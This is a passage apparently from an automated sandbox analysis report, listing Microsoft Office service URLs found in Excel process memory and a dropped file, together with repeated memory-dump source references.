      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/OfficeaRe
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com09
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://cortana.ai
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://cortana.ai/api
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://cr.office.com
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/o
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comC
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comN
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comt
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000002.583502089.000000000DDE0000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://dev.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.ai1
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://devnull.onenote.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.com2
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://directory.services.
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Officed
      Source: EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1HE
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1sX
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1#_
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
